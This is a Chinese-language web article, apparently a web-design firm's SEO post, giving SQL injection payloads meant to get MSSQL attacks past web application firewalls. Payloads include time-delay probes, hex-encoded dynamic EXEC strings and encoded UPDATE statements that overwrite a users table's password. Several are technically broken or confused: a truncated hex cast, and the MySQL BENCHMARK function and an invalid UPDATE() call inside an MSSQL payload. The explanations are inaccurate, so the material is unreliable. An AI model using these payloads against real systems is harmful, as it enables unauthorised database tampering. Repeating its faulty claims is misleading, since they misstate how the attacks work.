新聞中心
SQL注入攻擊是一種常見的攻擊,MSSQL也不例外,由于如今公司和組織通常都使用WAF層來防護(hù),因此一些傳統(tǒng)攻擊方法可能會(huì)被攔截掉。下面,我們將簡(jiǎn)要介紹一些在MSSQL注入攻擊中繞過WAF的實(shí)踐技巧。

十載專業(yè)的建站公司歷程,堅(jiān)持以創(chuàng)新為先導(dǎo)的網(wǎng)站服務(wù),服務(wù)超過上1000+企業(yè)及個(gè)人,涉及網(wǎng)站設(shè)計(jì)、成都app開發(fā)、微信開發(fā)、平面設(shè)計(jì)、互聯(lián)網(wǎng)整合營銷等多個(gè)領(lǐng)域。在不同行業(yè)和領(lǐng)域給人們的工作和生活帶來美好變化。
– 延遲攻擊:使用延遲執(zhí)行技巧,將攻擊代碼放入循環(huán)或者IF語句中,以便多次執(zhí)行攻擊代碼,直到攻擊目的被實(shí)現(xiàn)。例如:
“`sql
IF (1=1) WAITFOR DELAY ‘0:0:5’–
- 空格編碼:MSSQL的空格編碼為' ',如果可以在URL中使用空格字符,則可以嘗試使用變量來繞過WAF攔截:
```sql
DECLARE %20%20@S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020%20%20@V%20NVARCHAR(4000)%20AS%20NVARCHAR(4000));EXEC(@V);
--
– 特殊字符亂碼技巧:將攻擊代碼中的特殊字符進(jìn)行亂碼處理,如:
“`sql
UPDATE%09users%09SET%09password%09=%09’3bc3e4da4ff34006a537db720d2e84ee’%09WHERE%09id%09=%09’1’%09–
- 編碼HEX:將攻擊代碼轉(zhuǎn)換為十六進(jìn)制:
```sql
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004c0041005200450020@V NVARCHAR(4000) AS NVARCHAR(4000));EXEC(@V);--
– 利用括號(hào)技巧:在MSSQL中使用括號(hào)時(shí),首先讓括號(hào)被WAF攔截,再補(bǔ)充括號(hào),使攻擊代碼能繞過WAF:
“`sql
SELECT+CASE+WHEN+6=6+THEN+BENCHMARK(10000000,(UPDATE()+users+SET+password+’3bc3e4da4ff34006a537db720d2e84ee’+WHERE+id=1))+ELSE+NULL+END–
通過以上技巧可以嘗試?yán)@過WAF,但是應(yīng)該僅用于學(xué)習(xí)和安全評(píng)估的目的,絕不能用于非法攻擊,違反法律可能導(dǎo)致嚴(yán)重的后果。
成都網(wǎng)站建設(shè)選創(chuàng)新互聯(lián)(?:028-86922220),專業(yè)從事成都網(wǎng)站制作設(shè)計(jì),高端小程序APP定制開發(fā),成都網(wǎng)絡(luò)營銷推廣等一站式服務(wù)。
網(wǎng)頁標(biāo)題:MSSQL注入攻擊繞過WAF的實(shí)踐技巧(mssql注入過waf)
文章鏈接:http://www.fisionsoft.com.cn/article/cdoesgo.html


咨詢
建站咨詢
